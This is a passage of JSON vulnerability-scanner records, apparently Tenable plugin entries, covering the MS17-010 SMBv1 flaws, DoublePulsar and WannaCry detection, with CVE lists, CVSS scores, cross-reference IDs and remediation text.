["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0145", "CVE-2017-0143"]}, {"type": "symantec", "idList": ["SMNTC-96707", "SMNTC-96709", "SMNTC-96705", "SMNTC-96703", "SMNTC-96704", "SMNTC-96706"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", 
"THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145", "MS:CVE-2017-0143", "MS:CVE-2017-0148"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC", "MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}], "modified": "2021-08-11T13:58:48", "rev": 2}, "score": {"value": 5.7, "vector": "NONE", "modified": "2021-08-11T13:58:48", "rev": 2}}, "objectVersion": "1.6", "pluginID": "700059", "sourceData": "Binary data 700059.prm", "naslFamily": "Web Servers", "cpe": ["cpe:2.3:a:samba:samba:*:*:*:*:*:*:*:*"], "solution": "Remove the Double Pulsar backdoor and disable SMBv1.", "nessusSeverity": "", "cvssScoreSource": 
"", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": "2017-03-14T00:00:00", "vulnerabilityPublicationDate": "2017-03-14T00:00:00", "exploitableWith": ["Metasploit: MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption"]}, "lastseen": "2021-08-11T13:58:48", "differentElements": ["exploitableWith", "nessusSeverity"], "edition": 1}], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", 
"RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96703", "SMNTC-96706", "SMNTC-96707", "SMNTC-96705", "SMNTC-96709"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0205", "CPAI-2017-0203", "CPAI-2017-0177", "CPAI-2017-0419", "CPAI-2017-0200", "CPAI-2017-0198"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", 
"idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0148"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-08-19T12:37:13", "rev": 2}, "score": {"value": 6.1, "vector": "NONE", "modified": "2021-08-19T12:37:13", "rev": 2}}, "objectVersion": "1.6", "pluginID": "700059", "sourceData": "Binary data 700059.prm", "naslFamily": "Web Servers", "cpe": ["cpe:2.3:a:samba:samba:*:*:*:*:*:*:*:*"], "solution": "Remove the Double Pulsar backdoor and disable SMBv1.", "nessusSeverity": "Critical", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": "2017-03-14T00:00:00", "vulnerabilityPublicationDate": "2017-03-14T00:00:00", "exploitableWith": ["Metasploit(MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption)"], "_object_type": "robots.models.nessus.NessusBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.nessus.NessusBulletin"]}, {"id": "700099.PRM", "hash": "4514023ad2777a66ba0db81fa7e82cc6", "type": "nessus", "bulletinFamily": "scanner", "title": "Ransomware Traffic Detected (WannaCry)", "description": "The remote system may be affected by ransomware that encrypts most or all of the files on a user's computer. Then, the software demands that a ransom be paid in order to have the files decrypted. 
This attack is related to the recent ShadowBrokers dump containing NSA weaponized software exploits.", "published": "2017-05-15T00:00:00", "modified": "2019-03-06T00:00:00", "cvss": {"score": 10, "vector": "CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nnm/700099", "reporter": "Tenable", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "http://www.nessus.org/u?cd7c91b0", "https://technet.microsoft.com/library/security/ms17-010"], "cvelist": ["CVE-2017-0143", "CVE-2017-0146", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-08-19T12:36:49", "history": [{"bulletin": {"id": "700099.PRM", "hash": "57c66d538f7312c9b606ff3e3020056e", "type": "nessus", "bulletinFamily": "scanner", "title": "Ransomware Traffic Detected (WannaCry)", "description": "The remote system may be affected by ransomware that encrypts most or all of the files on a user's computer. Then, the software demands that a ransom be paid in order to have the files decrypted. 
This attack is related to the recent ShadowBrokers dump containing NSA weaponized software exploits.", "published": "2017-05-15T00:00:00", "modified": "2019-03-06T00:00:00", "cvss": {"score": 10, "vector": "CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nnm/700099", "reporter": "Tenable", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "http://www.nessus.org/u?cd7c91b0", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145", "https://technet.microsoft.com/library/security/ms17-010"], "cvelist": ["CVE-2017-0143", "CVE-2017-0146", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-08-11T13:58:22", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987", "EDB-ID:42030", "EDB-ID:42031"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", 
"RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "nessus", "idList": ["700059.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0147"]}, {"type": "symantec", "idList": ["SMNTC-96705", "SMNTC-96703", "SMNTC-96709", "SMNTC-96706", "SMNTC-96704", "SMNTC-96707"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", 
"THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145", "MS:CVE-2017-0148", "MS:CVE-2017-0143", "MS:CVE-2017-0144"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:9EF85E0CE1D118D27911357B1C516074"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-08-11T13:58:22", "rev": 2}, "score": {"value": 5.6, "vector": "NONE", "modified": "2021-08-11T13:58:22", "rev": 2}}, "objectVersion": "1.6", "pluginID": "700099", "sourceData": "Binary data 700099.prm", "naslFamily": "Generic", "cpe": [], "solution": "A remote service may be attempting to target user data and potentially encrypt it, rendering it unattainable until the user pays a ransom to have it decrypted. This type of issue can quickly spread laterally through organizations. 
Inspect the system for malicious code, and follow appropriate incident response procedures.", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": "2017-03-14T00:00:00", "vulnerabilityPublicationDate": "2017-03-14T00:00:00", "exploitableWith": ["Metasploit: MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption"]}, "lastseen": "2021-08-11T13:58:22", "differentElements": ["exploitableWith", "nessusSeverity"], "edition": 1}], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700059.PRM", 
"MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96703", "SMNTC-96706", "SMNTC-96707", "SMNTC-96705", "SMNTC-96709"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0205", "CPAI-2017-0203", "CPAI-2017-0177", "CPAI-2017-0419", "CPAI-2017-0200", "CPAI-2017-0198"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", 
"idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0148"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-08-19T12:36:49", "rev": 2}, "score": {"value": 5.6, "vector": "NONE", "modified": "2021-08-19T12:36:49", "rev": 2}}, "objectVersion": "1.6", "pluginID": "700099", "sourceData": "Binary data 700099.prm", "naslFamily": "Generic", "cpe": [], "solution": "A remote service may be attempting to target user data and potentially encrypt it, rendering it unattainable until the user pays a ransom to have it decrypted. This type of issue can quickly spread laterally through organizations. 
Inspect the system for malicious code, and follow appropriate incident response procedures.", "nessusSeverity": "Critical", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": "2017-03-14T00:00:00", "vulnerabilityPublicationDate": "2017-03-14T00:00:00", "exploitableWith": ["Metasploit(MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption)"], "_object_type": "robots.models.nessus.NessusBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.nessus.NessusBulletin"]}, {"id": "SMB_NT_MS17-010.NASL", "hash": "c3cfbf804787e9c7754f38fc5f836f24", "type": "nessus", "bulletinFamily": "scanner", "title": "MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya)", "description": "The remote Windows host is missing a security update. It is, therefore, affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling of certain requests. An unauthenticated, remote attacker can exploit these vulnerabilities, via a specially crafted packet, to execute arbitrary code. (CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling of certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are four of multiple Equation Group vulnerabilities and exploits disclosed on 2017/04/14 by a group known as the Shadow Brokers. WannaCry / WannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit, and EternalRocks is a worm that utilizes seven Equation Group vulnerabilities. 
Petya is a ransomware program that first utilizes CVE-2017-0199, a vulnerability in Microsoft Office, and then spreads via ETERNALBLUE.", "published": "2017-03-15T00:00:00", "modified": "2019-11-13T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/97737", "reporter": "This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "https://github.com/stamparm/EternalRocks/", "http://www.nessus.org/u?d9f569cf", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146", "https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010", "http://www.nessus.org/u?321523eb", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145", "http://www.nessus.org/u?065561d0", "http://www.nessus.org/u?59db5b5b"], "cvelist": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-10-22T13:01:22", "history": [{"bulletin": {"id": "SMB_NT_MS17-010.NASL", "hash": "f8cc500435fdab6b32ed7a3b6b64c4e28e08f4b4210e921f0ddf025d26a10830", "type": "nessus", "bulletinFamily": "scanner", "title": "MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya)", "description": "The remote Windows host is missing a security update. 
